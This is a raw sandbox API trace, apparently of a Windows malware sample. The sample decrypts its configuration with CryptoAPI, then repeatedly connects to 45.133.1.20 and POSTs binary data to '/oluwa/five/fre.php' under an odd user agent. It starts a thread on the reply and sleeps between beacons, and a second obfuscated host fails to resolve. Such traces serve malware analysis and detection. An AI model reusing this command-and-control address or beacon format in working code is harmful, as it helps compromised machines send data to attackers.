[0193.360] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0193.361] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0193.361] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0193.361] GetProcessHeap () returned 0x6a0000 [0193.361] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0193.362] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0193.363] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0193.363] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0193.364] CryptDestroyKey (hKey=0x6ad020) returned 1 [0193.364] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0193.365] CryptReleaseContext (hProv=0x6bf058, dwFlags=0x0) returned 1 [0193.365] GetProcessHeap () returned 0x6a0000 [0193.365] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0193.366] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0193.366] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0193.367] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0193.367] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0193.368] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0193.368] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0193.369] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0193.370] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0193.370] GetProcessHeap () returned 0x6a0000 [0193.370] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0193.370] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0193.370] GetProcessHeap () returned 0x6a0000 [0193.370] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baae0 [0193.370] socket (af=2, type=1, protocol=6) returned 0x4bc [0193.370] connect (s=0x4bc, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0193.395] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0193.395] GetProcessHeap () returned 0x6a0000 [0193.396] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beb90 [0193.396] GetProcessHeap () returned 0x6a0000 [0193.396] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c5ef0 [0193.396] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0193.397] wvsprintfA (in: param_1=0x6c5ef0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0193.397] GetProcessHeap () returned 0x6a0000 [0193.397] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bb458 [0193.397] GetProcessHeap () returned 0x6a0000 [0193.398] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c5ef0 | out: hHeap=0x6a0000) returned 1 [0193.398] GetProcessHeap () returned 0x6a0000 [0193.398] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b49a0 [0193.398] GetProcessHeap () returned 0x6a0000 [0193.398] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c5ef0 [0193.399] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0193.400] wvsprintfA (in: param_1=0x6c5ef0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0193.400] GetProcessHeap () returned 0x6a0000 [0193.400] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0193.400] GetProcessHeap () returned 0x6a0000 [0193.401] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c5ef0 | out: hHeap=0x6a0000) returned 1 [0193.401] send (s=0x4bc, buf=0x6b5c98*, len=242, flags=0) returned 242 [0193.402] send (s=0x4bc, buf=0x6bb998*, len=159, flags=0) returned 159 [0193.402] GetProcessHeap () returned 0x6a0000 [0193.402] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0193.402] recv (in: s=0x4bc, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0193.477] GetProcessHeap () returned 0x6a0000 [0193.478] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0193.478] GetProcessHeap () returned 0x6a0000 [0193.478] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0193.478] GetProcessHeap () returned 0x6a0000 [0193.479] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0193.479] GetProcessHeap () returned 0x6a0000 [0193.479] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb90 | out: hHeap=0x6a0000) returned 1 [0193.481] closesocket (s=0x4bc) returned 0 [0193.482] GetProcessHeap () returned 0x6a0000 [0193.482] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baae0 | out: hHeap=0x6a0000) returned 1 [0193.482] GetProcessHeap () returned 0x6a0000 [0193.482] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0193.482] GetProcessHeap () returned 0x6a0000 [0193.483] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0193.483] GetProcessHeap () returned 0x6a0000 [0193.483] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0193.483] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x12b0) returned 0x4bc [0193.485] Sleep (dwMilliseconds=0xea60) [0193.487] GetProcessHeap () returned 0x6a0000 [0193.487] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0193.491] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0193.492] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0193.507] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0193.507] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf168) returned 1 [0193.528] GetProcessHeap () returned 0x6a0000 [0193.528] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0193.529] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0193.530] CryptImportKey (in: hProv=0x6bf168, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0193.531] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0193.531] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0193.532] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0193.535] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0193.535] GetProcessHeap () returned 0x6a0000 [0193.536] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0193.537] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0193.537] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0193.538] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0193.539] CryptDestroyKey (hKey=0x6ad020) returned 1 [0193.540] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0193.540] CryptReleaseContext (hProv=0x6bf168, dwFlags=0x0) returned 1 [0193.540] GetProcessHeap () returned 0x6a0000 [0193.540] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0193.541] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0193.542] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0193.543] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0193.543] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0193.544] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0193.544] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0193.545] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0193.546] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0193.546] GetProcessHeap () returned 0x6a0000 [0193.546] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0193.546] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0193.546] GetProcessHeap () returned 0x6a0000 [0193.547] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0193.547] GetProcessHeap () returned 0x6a0000 [0193.547] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0193.547] GetProcessHeap () returned 0x6a0000 [0193.548] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0193.548] GetProcessHeap () returned 0x6a0000 [0193.548] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0193.549] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0193.551] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0193.562] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0193.562] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0193.571] GetProcessHeap () returned 0x6a0000 [0193.571] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0193.572] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0193.572] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0193.573] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0193.573] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0193.574] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0193.574] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0193.574] GetProcessHeap () returned 0x6a0000 [0193.575] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0193.576] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0193.576] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0193.577] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0193.577] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0193.578] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0193.578] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0193.578] GetProcessHeap () returned 0x6a0000 [0193.578] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0193.579] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0193.580] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0193.580] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0193.581] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0193.582] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0193.582] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0193.583] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0193.583] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0193.583] GetProcessHeap () returned 0x6a0000 [0193.583] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0193.583] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0193.583] GetProcessHeap () returned 0x6a0000 [0193.583] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba970 [0193.583] socket (af=2, type=1, protocol=6) returned 0x4c0 [0193.584] connect (s=0x4c0, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0193.611] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0193.611] GetProcessHeap () returned 0x6a0000 [0193.611] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0193.611] GetProcessHeap () returned 0x6a0000 [0193.611] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c5ef0 [0193.612] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0193.613] wvsprintfA (in: param_1=0x6c5ef0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0193.613] GetProcessHeap () returned 0x6a0000 [0193.613] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bb458 [0193.613] GetProcessHeap () returned 0x6a0000 [0193.614] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c5ef0 | out: hHeap=0x6a0000) returned 1 [0193.614] GetProcessHeap () returned 0x6a0000 [0193.614] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0193.614] GetProcessHeap () returned 0x6a0000 [0193.614] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c5ef0 [0193.615] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0193.617] wvsprintfA (in: param_1=0x6c5ef0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0193.618] GetProcessHeap () returned 0x6a0000 [0193.618] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0193.618] GetProcessHeap () returned 0x6a0000 [0193.618] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c5ef0 | out: hHeap=0x6a0000) returned 1 [0193.618] send (s=0x4c0, buf=0x6b5c98*, len=242, flags=0) returned 242 [0193.619] send (s=0x4c0, buf=0x6bb998*, len=159, flags=0) returned 159 [0193.619] GetProcessHeap () returned 0x6a0000 [0193.619] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0193.619] recv (in: s=0x4c0, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0193.695] GetProcessHeap () returned 0x6a0000 [0193.695] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0193.695] GetProcessHeap () returned 0x6a0000 [0193.696] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0193.696] GetProcessHeap () returned 0x6a0000 [0193.696] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0193.696] GetProcessHeap () returned 0x6a0000 [0193.696] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0193.696] closesocket (s=0x4c0) returned 0 [0193.698] GetProcessHeap () returned 0x6a0000 [0193.698] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba970 | out: hHeap=0x6a0000) returned 1 [0193.698] GetProcessHeap () returned 0x6a0000 [0193.699] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0193.699] GetProcessHeap () returned 0x6a0000 [0193.699] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0193.699] GetProcessHeap () returned 0x6a0000 [0193.699] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0193.700] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x12bc) returned 0x4c0 [0193.701] Sleep (dwMilliseconds=0xea60) [0193.703] GetProcessHeap () returned 0x6a0000 [0193.703] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0193.704] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0193.705] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0193.712] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0193.712] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf168) returned 1 [0193.724] GetProcessHeap () returned 0x6a0000 [0193.724] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0193.725] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0193.726] CryptImportKey (in: hProv=0x6bf168, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0193.727] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0193.727] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0193.728] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0193.729] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0193.729] GetProcessHeap () returned 0x6a0000 [0193.729] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0193.733] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0193.734] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0193.735] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0193.735] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0193.737] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0193.737] CryptReleaseContext (hProv=0x6bf168, dwFlags=0x0) returned 1 [0193.737] GetProcessHeap () returned 0x6a0000 [0193.737] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0193.741] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0193.741] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0193.742] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0193.743] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0193.743] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0193.744] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0193.745] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0193.746] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0193.746] GetProcessHeap () returned 0x6a0000 [0193.746] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0193.746] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0193.747] GetProcessHeap () returned 0x6a0000 [0193.747] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0193.747] GetProcessHeap () returned 0x6a0000 [0193.747] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0193.748] GetProcessHeap () returned 0x6a0000 [0193.748] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0193.748] GetProcessHeap () returned 0x6a0000 [0193.748] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0193.749] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0193.750] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0193.761] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0193.762] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0193.771] GetProcessHeap () returned 0x6a0000 [0193.771] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0193.772] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0193.772] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0193.773] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0193.773] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0193.774] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0193.774] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0193.774] GetProcessHeap () returned 0x6a0000 [0193.775] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0193.778] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0193.778] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0193.779] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0193.779] CryptDestroyKey (hKey=0x6ad4e0) returned 1 